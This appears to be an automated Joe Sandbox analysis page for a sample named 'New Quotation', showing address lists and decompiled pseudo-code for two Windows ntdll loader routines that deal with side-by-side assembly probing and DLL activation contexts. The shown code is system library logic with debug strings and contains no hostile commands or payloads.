                                                                                                                                                                                          0x1d868e61
                                                                                                                                                                                          0x1d868e65
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868e70
                                                                                                                                                                                          0x1d868ea9
                                                                                                                                                                                          0x1d868ea9
                                                                                                                                                                                          0x1d868eae
                                                                                                                                                                                          0x1d868eb2
                                                                                                                                                                                          0x1d868eb3
                                                                                                                                                                                          0x1d868ebf
                                                                                                                                                                                          0x1d868ec0
                                                                                                                                                                                          0x1d868ec2
                                                                                                                                                                                          0x1d868ecb
                                                                                                                                                                                          0x1d868ecf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868eda
                                                                                                                                                                                          0x1d868ede
                                                                                                                                                                                          0x1d868ff2
                                                                                                                                                                                          0x1d868ff2
                                                                                                                                                                                          0x1d868efb
                                                                                                                                                                                          0x1d868efd
                                                                                                                                                                                          0x1d868efd
                                                                                                                                                                                          0x1d868ff9
                                                                                                                                                                                          0x1d869036
                                                                                                                                                                                          0x1d86903a
                                                                                                                                                                                          0x1d869067
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d869067
                                                                                                                                                                                          0x1d86903c
                                                                                                                                                                                          0x1d869041
                                                                                                                                                                                          0x1d869043
                                                                                                                                                                                          0x1d869045
                                                                                                                                                                                          0x1d869045
                                                                                                                                                                                          0x1d86904a
                                                                                                                                                                                          0x1d86905d
                                                                                                                                                                                          0x1d869062
                                                                                                                                                                                          0x1d868ffb
                                                                                                                                                                                          0x1d868ffd
                                                                                                                                                                                          0x1d86902f
                                                                                                                                                                                          0x1d86906c
                                                                                                                                                                                          0x1d86906c
                                                                                                                                                                                          0x1d869075
                                                                                                                                                                                          0x1d86907a
                                                                                                                                                                                          0x1d86907a
                                                                                                                                                                                          0x1d86907e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d869084
                                                                                                                                                                                          0x1d86908e
                                                                                                                                                                                          0x1d869093
                                                                                                                                                                                          0x1d86909f
                                                                                                                                                                                          0x1d8690a3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8690ae
                                                                                                                                                                                          0x1d8690c5
                                                                                                                                                                                          0x1d8690b7
                                                                                                                                                                                          0x1d8690bf
                                                                                                                                                                                          0x1d8690bf
                                                                                                                                                                                          0x1d8690ce
                                                                                                                                                                                          0x1d8690d8
                                                                                                                                                                                          0x1d8690d8
                                                                                                                                                                                          0x1d8690e2
                                                                                                                                                                                          0x1d8690f7
                                                                                                                                                                                          0x1d869104
                                                                                                                                                                                          0x1d869104
                                                                                                                                                                                          0x1d869106
                                                                                                                                                                                          0x1d86910f
                                                                                                                                                                                          0x1d869113
                                                                                                                                                                                          0x1d869123
                                                                                                                                                                                          0x1d869128
                                                                                                                                                                                          0x1d869132
                                                                                                                                                                                          0x1d869135
                                                                                                                                                                                          0x1d869139
                                                                                                                                                                                          0x1d869143
                                                                                                                                                                                          0x1d869145
                                                                                                                                                                                          0x1d869147
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d86914d
                                                                                                                                                                                          0x1d869152
                                                                                                                                                                                          0x1d86917d
                                                                                                                                                                                          0x1d86917d
                                                                                                                                                                                          0x1d869182
                                                                                                                                                                                          0x1d8691a6
                                                                                                                                                                                          0x1d8691a6
                                                                                                                                                                                          0x1d8691ae
                                                                                                                                                                                          0x1d8691b0
                                                                                                                                                                                          0x1d8691b5
                                                                                                                                                                                          0x1d8691c2
                                                                                                                                                                                          0x1d8691c4
                                                                                                                                                                                          0x1d8691c6
                                                                                                                                                                                          0x1d8691d3
                                                                                                                                                                                          0x1d8691d3
                                                                                                                                                                                          0x1d8691c6
                                                                                                                                                                                          0x1d8691b5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8691ae
                                                                                                                                                                                          0x1d86918f
                                                                                                                                                                                          0x1d869191
                                                                                                                                                                                          0x1d869193
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8691a0
                                                                                                                                                                                          0x1d8691a2
                                                                                                                                                                                          0x1d8691a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8691a4
                                                                                                                                                                                          0x1d869154
                                                                                                                                                                                          0x1d869159
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d869166
                                                                                                                                                                                          0x1d869168
                                                                                                                                                                                          0x1d86916a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d869177
                                                                                                                                                                                          0x1d869179
                                                                                                                                                                                          0x1d86917b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d869115
                                                                                                                                                                                          0x1d869115
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d869115
                                                                                                                                                                                          0x1d869113
                                                                                                                                                                                          0x1d868fff
                                                                                                                                                                                          0x1d869006
                                                                                                                                                                                          0x1d869008
                                                                                                                                                                                          0x1d869008
                                                                                                                                                                                          0x1d86900d
                                                                                                                                                                                          0x1d86900e
                                                                                                                                                                                          0x1d869025
                                                                                                                                                                                          0x1d86902a
                                                                                                                                                                                          0x1d86902a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868ff9
                                                                                                                                                                                          0x1d868e7d
                                                                                                                                                                                          0x1d868e81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868e87
                                                                                                                                                                                          0x1d868e8c
                                                                                                                                                                                          0x1d868f73
                                                                                                                                                                                          0x1d868f75
                                                                                                                                                                                          0x1d868f77
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868f8d
                                                                                                                                                                                          0x1d868f8f
                                                                                                                                                                                          0x1d868f91
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868f97
                                                                                                                                                                                          0x1d868fa1
                                                                                                                                                                                          0x1d868fa4
                                                                                                                                                                                          0x1d868fa7
                                                                                                                                                                                          0x1d868faa
                                                                                                                                                                                          0x1d868fbf
                                                                                                                                                                                          0x1d868fc1
                                                                                                                                                                                          0x1d868fc4
                                                                                                                                                                                          0x1d868fc6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868fd1
                                                                                                                                                                                          0x1d868fe3
                                                                                                                                                                                          0x1d868fe8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868fe8
                                                                                                                                                                                          0x1d868e9f
                                                                                                                                                                                          0x1d868ea3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868ea3
                                                                                                                                                                                          0x1d868e13
                                                                                                                                                                                          0x1d868e14
                                                                                                                                                                                          0x1d868e1a
                                                                                                                                                                                          0x1d868e1b
                                                                                                                                                                                          0x1d868e1d
                                                                                                                                                                                          0x1d868e26
                                                                                                                                                                                          0x1d868e28
                                                                                                                                                                                          0x1d868e2a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868e40
                                                                                                                                                                                          0x1d868e44
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868e44

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                                                          • API String ID: 2994545307-3063724069
                                                                                                                                                                                          • Opcode ID: ac8f536d783ccd389bf4275f2135588b2689b1434139bd7472f85d5b253e0e31
                                                                                                                                                                                          • Instruction ID: f61b870998664b8a2a53f04ffbcc0867829ead2e17bc9a89d27944818e3f0e88
                                                                                                                                                                                          • Opcode Fuzzy Hash: ac8f536d783ccd389bf4275f2135588b2689b1434139bd7472f85d5b253e0e31
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60D1E872808355AFD721DA14C884BABB7ECEF88734F05492DFA9897190E774DD4887A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D802EB8 Relevance: 9.1, Strings: 7, Instructions: 307COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                          			E1D802EB8(signed short __edx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16, signed int* _a20) {
				signed int _v12;
				char _v536;
				signed int _v537;
				signed int* _v544;
				signed int _v548;
				intOrPtr _v552;
				signed short _v556;
				char _v560;
				signed int _v564;
				intOrPtr _v568;
				signed short _v572;
				signed short _v576;
				signed int _v584;
				signed short _v588;
				signed short _v592;
				intOrPtr _v596;
				signed short _v600;
				char _v604;
				signed short _v608;
				signed short _v612;
				intOrPtr _v616;
				char* _v620;
				intOrPtr _v624;
				char _v628;
				char _v636;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t92;
				signed short _t104;
				signed short _t107;
				short _t110;
				signed int _t117;
				char _t122;
				intOrPtr _t124;
				void* _t129;
				signed int _t133;
				short* _t137;
				signed int _t147;
				signed short _t148;
				intOrPtr _t149;
				signed short _t152;
				signed int _t154;
				short _t156;
				signed int _t169;
				void* _t170;
				void* _t171;
				signed short* _t173;
				void* _t174;
				void* _t175;
				short* _t178;
				intOrPtr _t179;
				signed int _t180;

				_v12 =  *0x1d8cb370 ^ _t180;
				_t149 = _a8;
				_t92 = _a12;
				_t148 = __edx;
				_v568 = _t149;
				_v572 = _a16;
				_t173 = _a4;
				_v544 = _a20;
				_v548 = _v548 & 0;
				_v584 = 0;
				_t169 = 0;
				_v537 = 0;
				_v560 = 0;
				_v556 = 0;
				_v576 = 0;
				_t167 = _v572;
				_v564 = _t173;
				_v552 = _t92;
				if(_t167 != 0) {
					 *_t167 =  *_t167 & 0;
				}
				if(_v544 != _t169) {
					 *_v544 =  *_v544 & _t169;
					_t149 = _v568;
				}
				if(_t148 == 0 || _t173 == 0 || _t149 == 0 || _t92 == 0 || _t167 == 0 || _v544 == _t169) {
					_push(_v544);
					_push(_t167);
					_push(_t92);
					_push(_t149);
					_push(_t173);
					_push(_t148);
					_push(0);
					E1D85EF10(0x33, 0, "SXS: %s() bad parameters\nSXS:  Flags:               0x%lx\nSXS:  Root:                %p\nSXS:  AssemblyDirectory:   %p\nSXS:  PreAllocatedString:  %p\nSXS:  DynamicString:       %p\nSXS:  StringUsed:          %p\nSXS:  OpenDirectoryHandle: %p\n", "RtlpProbeAssemblyStorageRootForAssembly");
					_t174 = 0xc000000d;
					goto L24;
				} else {
					_t152 =  *_t148 & 0x0000ffff;
					_t167 = _t152;
					_t171 = 0x5c;
					if(_t152 != 0) {
						_t147 =  *( *((intOrPtr*)(_t148 + 4)) + (_t152 >> 1) * 2 - 2) & 0x0000ffff;
						_t152 =  *_t148 & 0x0000ffff;
						if(_t147 != _t171) {
							if(_t147 != 0x2f) {
								_v537 = 1;
								_t167 = _t167 + 2;
							}
						}
					}
					_t104 = ( *_t173 & 0x0000ffff) + 4 + _t167;
					_v588 = _t104;
					if(_t104 > 0xfffe) {
						_push("SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.\n");
						_push(0);
						_push(0x33);
						E1D85EF10();
						_t174 = 0xc0000106;
						L28:
						if(_v548 != 0) {
							_push(_v548);
							E1D812A80();
						}
						_pop(_t170);
						_pop(_t175);
						return E1D814B50(_t174, _t148, _v12 ^ _t180, _t167, _t170, _t175);
					}
					if(_t104 > 0x208) {
						_t176 = _t104 & 0x0000ffff;
						_t169 = E1D7E5D60(_t104 & 0x0000ffff);
						if(_t169 != 0) {
							_t107 =  *_t148 & 0x0000ffff;
							goto L15;
						}
						E1D85EF10(0x33, _t106, "SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.\n", _t176);
						_t174 = 0xc0000017;
						goto L28;
					} else {
						_t169 =  &_v536;
						_t107 = _t152 & 0x0000ffff;
						L15:
						E1D8188C0(_t169,  *((intOrPtr*)(_t148 + 4)), _t107 & 0x0000ffff);
						_t178 = ( *_t148 & 0x0000ffff) + _t169;
						if(_v537 != 0) {
							_t110 = 0x5c;
							 *_t178 = _t110;
							_t178 = _t178 + 2;
						}
						E1D8188C0(_t178,  *((intOrPtr*)(_v564 + 4)),  *_v564 & 0x0000ffff);
						_t154 = _v564;
						_t167 = 0;
						 *((short*)(( *_t154 & 0x0000ffff) + _t178)) = 0;
						_t117 = (_v537 & 0x000000ff) + (_v537 & 0x000000ff) +  *_t154 +  *_t148;
						_t148 = 0;
						_v584 = _t117;
						if(E1D7F1C10(_t169,  &_v560, 0,  &_v604) == 0) {
							E1D85EF10(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _t169);
							_t174 = 0xc000003a;
							goto L26;
						} else {
							_t122 = _v604;
							_t167 = _v556;
							_v576 = _v556;
							if(_t122 != 0) {
								_v560 = _t122;
								_v556 = _v600;
								_t124 = _v596;
							} else {
								_t124 = 0;
							}
							_v624 = _t124;
							_push(0x21);
							_v620 =  &_v560;
							_push(3);
							_push( &_v636);
							_v628 = 0x18;
							_push( &_v628);
							_push(0x100020);
							_v616 = 0x40;
							_push( &_v548);
							_v612 = _t148;
							_v608 = _t148;
							_t129 = E1D812CE0();
							_t148 = _v592;
							_t174 = _t129;
							if(_t148 != 0) {
								asm("lock xadd [ebx], ecx");
								if((_t154 | 0xffffffff) == 0) {
									_push( *((intOrPtr*)(_t148 + 4)));
									E1D812A80();
									E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t148);
								}
							}
							if(_t174 < 0) {
								if(_t174 == 0xc000000f || _t174 == 0xc0000034 || _t174 == 0xc000003a) {
									_t174 = 0xc0150004;
								} else {
									_push(_t174);
									E1D85EF10(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _t169);
								}
								goto L24;
							} else {
								_t179 = _v568;
								_t148 = _v588;
								if(_t148 > ( *(_t179 + 2) & 0x0000ffff)) {
									if(_t169 ==  &_v536) {
										_t133 = E1D7E5D60(_t148);
										_t179 = _v552;
										 *(_t179 + 4) = _t133;
										if(_t133 != 0) {
											E1D8188C0( *(_t179 + 4), _t169, _v584 & 0x0000ffff);
											L52:
											 *(_t179 + 2) = _t148;
											goto L23;
										}
										_t174 = 0xc0000017;
										goto L24;
									}
									_t179 = _v552;
									 *(_t179 + 4) = _t169;
									_t169 = 0;
									goto L52;
								} else {
									E1D8188C0( *(_t179 + 4), _t169, _v584 & 0x0000ffff);
									L23:
									_t167 = _v572;
									_t156 = 0x5c;
									 *_t167 = _t179;
									_t137 = (_v584 & 0x0000ffff) +  *(_t179 + 4);
									 *_t137 = _t156;
									 *((short*)(_t137 + 2)) = 0;
									 *( *_t167) = _v584 + 2;
									_v548 = _v548 & 0x00000000;
									_t174 = 0;
									 *_v544 = _v548;
									L24:
									_t94 = _v576;
									if(_v576 != 0) {
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t94);
									}
									L26:
									if(_t169 != 0 && _t169 !=  &_v536) {
										E1D7CBA80(_t169);
									}
									goto L28;
								}
							}
						}
					}
				}
			}
























































                                                                                                                                                                                          0x1d802eca
                                                                                                                                                                                          0x1d802ecd
                                                                                                                                                                                          0x1d802ed0
                                                                                                                                                                                          0x1d802ed4
                                                                                                                                                                                          0x1d802ed6
                                                                                                                                                                                          0x1d802edf
                                                                                                                                                                                          0x1d802ee9
                                                                                                                                                                                          0x1d802eec
                                                                                                                                                                                          0x1d802ef4
                                                                                                                                                                                          0x1d802efb
                                                                                                                                                                                          0x1d802f01
                                                                                                                                                                                          0x1d802f03
                                                                                                                                                                                          0x1d802f09
                                                                                                                                                                                          0x1d802f0f
                                                                                                                                                                                          0x1d802f15
                                                                                                                                                                                          0x1d802f1b
                                                                                                                                                                                          0x1d802f21
                                                                                                                                                                                          0x1d802f27
                                                                                                                                                                                          0x1d802f2f
                                                                                                                                                                                          0x1d802f31
                                                                                                                                                                                          0x1d802f31
                                                                                                                                                                                          0x1d802f39
                                                                                                                                                                                          0x1d802f41
                                                                                                                                                                                          0x1d802f43
                                                                                                                                                                                          0x1d802f43
                                                                                                                                                                                          0x1d802f4b
                                                                                                                                                                                          0x1d8427a9
                                                                                                                                                                                          0x1d8427af
                                                                                                                                                                                          0x1d8427b0
                                                                                                                                                                                          0x1d8427b1
                                                                                                                                                                                          0x1d8427b2
                                                                                                                                                                                          0x1d8427b3
                                                                                                                                                                                          0x1d8427b4
                                                                                                                                                                                          0x1d8427c4
                                                                                                                                                                                          0x1d8427cc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802f7d
                                                                                                                                                                                          0x1d802f7d
                                                                                                                                                                                          0x1d802f80
                                                                                                                                                                                          0x1d802f84
                                                                                                                                                                                          0x1d802f88
                                                                                                                                                                                          0x1d802f8f
                                                                                                                                                                                          0x1d802f94
                                                                                                                                                                                          0x1d802f9a
                                                                                                                                                                                          0x1d84264b
                                                                                                                                                                                          0x1d842651
                                                                                                                                                                                          0x1d842658
                                                                                                                                                                                          0x1d842658
                                                                                                                                                                                          0x1d84264b
                                                                                                                                                                                          0x1d802f9a
                                                                                                                                                                                          0x1d802fa6
                                                                                                                                                                                          0x1d802fa8
                                                                                                                                                                                          0x1d802fb3
                                                                                                                                                                                          0x1d842660
                                                                                                                                                                                          0x1d842665
                                                                                                                                                                                          0x1d842667
                                                                                                                                                                                          0x1d842669
                                                                                                                                                                                          0x1d842671
                                                                                                                                                                                          0x1d80316c
                                                                                                                                                                                          0x1d803173
                                                                                                                                                                                          0x1d8427d6
                                                                                                                                                                                          0x1d8427dc
                                                                                                                                                                                          0x1d8427dc
                                                                                                                                                                                          0x1d80317e
                                                                                                                                                                                          0x1d80317f
                                                                                                                                                                                          0x1d803189
                                                                                                                                                                                          0x1d803189
                                                                                                                                                                                          0x1d802fbe
                                                                                                                                                                                          0x1d84267b
                                                                                                                                                                                          0x1d842684
                                                                                                                                                                                          0x1d842688
                                                                                                                                                                                          0x1d8426a5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8426a5
                                                                                                                                                                                          0x1d842693
                                                                                                                                                                                          0x1d84269b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802fc4
                                                                                                                                                                                          0x1d802fc4
                                                                                                                                                                                          0x1d802fca
                                                                                                                                                                                          0x1d802fcd
                                                                                                                                                                                          0x1d802fd5
                                                                                                                                                                                          0x1d802fe0
                                                                                                                                                                                          0x1d802fe9
                                                                                                                                                                                          0x1d8426af
                                                                                                                                                                                          0x1d8426b0
                                                                                                                                                                                          0x1d8426b3
                                                                                                                                                                                          0x1d8426b3
                                                                                                                                                                                          0x1d802ffd
                                                                                                                                                                                          0x1d803002
                                                                                                                                                                                          0x1d803008
                                                                                                                                                                                          0x1d803010
                                                                                                                                                                                          0x1d803021
                                                                                                                                                                                          0x1d803024
                                                                                                                                                                                          0x1d803026
                                                                                                                                                                                          0x1d803044
                                                                                                                                                                                          0x1d8426c4
                                                                                                                                                                                          0x1d8426cc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80304a
                                                                                                                                                                                          0x1d80304a
                                                                                                                                                                                          0x1d803050
                                                                                                                                                                                          0x1d803056
                                                                                                                                                                                          0x1d80305f
                                                                                                                                                                                          0x1d8426d6
                                                                                                                                                                                          0x1d8426e2
                                                                                                                                                                                          0x1d8426e8
                                                                                                                                                                                          0x1d803065
                                                                                                                                                                                          0x1d803065
                                                                                                                                                                                          0x1d803065
                                                                                                                                                                                          0x1d803067
                                                                                                                                                                                          0x1d803073
                                                                                                                                                                                          0x1d803075
                                                                                                                                                                                          0x1d803081
                                                                                                                                                                                          0x1d803083
                                                                                                                                                                                          0x1d80308a
                                                                                                                                                                                          0x1d803094
                                                                                                                                                                                          0x1d803095
                                                                                                                                                                                          0x1d8030a0
                                                                                                                                                                                          0x1d8030aa
                                                                                                                                                                                          0x1d8030ab
                                                                                                                                                                                          0x1d8030b1
                                                                                                                                                                                          0x1d8030b7
                                                                                                                                                                                          0x1d8030bc
                                                                                                                                                                                          0x1d8030c2
                                                                                                                                                                                          0x1d8030c6
                                                                                                                                                                                          0x1d8426f6
                                                                                                                                                                                          0x1d8426fa
                                                                                                                                                                                          0x1d842700
                                                                                                                                                                                          0x1d842703
                                                                                                                                                                                          0x1d842714
                                                                                                                                                                                          0x1d842714
                                                                                                                                                                                          0x1d8426fa
                                                                                                                                                                                          0x1d8030ce
                                                                                                                                                                                          0x1d842724
                                                                                                                                                                                          0x1d84274e
                                                                                                                                                                                          0x1d842736
                                                                                                                                                                                          0x1d842736
                                                                                                                                                                                          0x1d842741
                                                                                                                                                                                          0x1d842746
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8030d4
                                                                                                                                                                                          0x1d8030d4
                                                                                                                                                                                          0x1d8030da
                                                                                                                                                                                          0x1d8030e6
                                                                                                                                                                                          0x1d842760
                                                                                                                                                                                          0x1d842770
                                                                                                                                                                                          0x1d842775
                                                                                                                                                                                          0x1d84277b
                                                                                                                                                                                          0x1d842780
                                                                                                                                                                                          0x1d842798
                                                                                                                                                                                          0x1d8427a0
                                                                                                                                                                                          0x1d8427a0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8427a0
                                                                                                                                                                                          0x1d842782
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d842782
                                                                                                                                                                                          0x1d842762
                                                                                                                                                                                          0x1d842768
                                                                                                                                                                                          0x1d84276b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8030ec
                                                                                                                                                                                          0x1d8030f8
                                                                                                                                                                                          0x1d803100
                                                                                                                                                                                          0x1d803100
                                                                                                                                                                                          0x1d80310f
                                                                                                                                                                                          0x1d803110
                                                                                                                                                                                          0x1d803112
                                                                                                                                                                                          0x1d803115
                                                                                                                                                                                          0x1d80311a
                                                                                                                                                                                          0x1d803129
                                                                                                                                                                                          0x1d803138
                                                                                                                                                                                          0x1d80313f
                                                                                                                                                                                          0x1d803141
                                                                                                                                                                                          0x1d803143
                                                                                                                                                                                          0x1d803143
                                                                                                                                                                                          0x1d80314b
                                                                                                                                                                                          0x1d803159
                                                                                                                                                                                          0x1d803159
                                                                                                                                                                                          0x1d80315e
                                                                                                                                                                                          0x1d803160
                                                                                                                                                                                          0x1d80318d
                                                                                                                                                                                          0x1d80318d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d803160
                                                                                                                                                                                          0x1d8030e6
                                                                                                                                                                                          0x1d8030ce
                                                                                                                                                                                          0x1d803044
                                                                                                                                                                                          0x1d802fbe

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 1D8426BC
                                                                                                                                                                                          • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 1D84268B
                                                                                                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 1D842738
                                                                                                                                                                                          • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 1D8427BB
                                                                                                                                                                                          • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 1D8427B6
                                                                                                                                                                                          • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 1D842660
                                                                                                                                                                                          • @, xrefs: 1D8030A0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                                                                                                                                          • API String ID: 0-541586583
                                                                                                                                                                                          • Opcode ID: 43569ddb0f8e1a937ea0c5663b3b54064893c0604ebbd4e2ac662b3510c3e489
                                                                                                                                                                                          • Instruction ID: 9a4c6477f45b002b7c3162faa2e91d8b503db5bae1490f2629cf7b9a41d8aa89
                                                                                                                                                                                          • Opcode Fuzzy Hash: 43569ddb0f8e1a937ea0c5663b3b54064893c0604ebbd4e2ac662b3510c3e489
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62C1B075904229DBDB218F59CC88BBAB3B4EF49710F1180E9F908AB250E7749E81CF52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D804C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 41%
                                                                                                                                                                                          			E1D804C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x1d8c65e4; // 0x7535f0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x1d8c5b24; // 0x18e2b68
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_t47 = 0x5c;
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x1d8c65e4; // 0x7535f0e0
					 *0x1d8c91e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E1D7D26A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x1d8c37c0 & 0x00000003) != 0) {
								E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x1d8c37c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1d8c37c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
						E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}















